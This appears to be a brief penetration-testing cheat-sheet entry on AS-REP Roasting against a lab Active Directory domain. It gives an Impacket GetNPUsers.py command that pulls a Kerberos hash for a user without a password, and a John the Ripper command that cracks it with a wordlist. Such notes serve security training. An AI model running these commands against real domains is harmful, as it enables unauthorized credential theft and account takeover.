๐ŸฆธExploitation

ASREPRoasting

Getting Kerberos Tickets

GetNPUsers.py

python3 GetNPUsers.py
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass -dc-ip <domain IP address>

Crack Hashed Password

john hash.txt --wordlist=<Location of Wordlist>

Last updated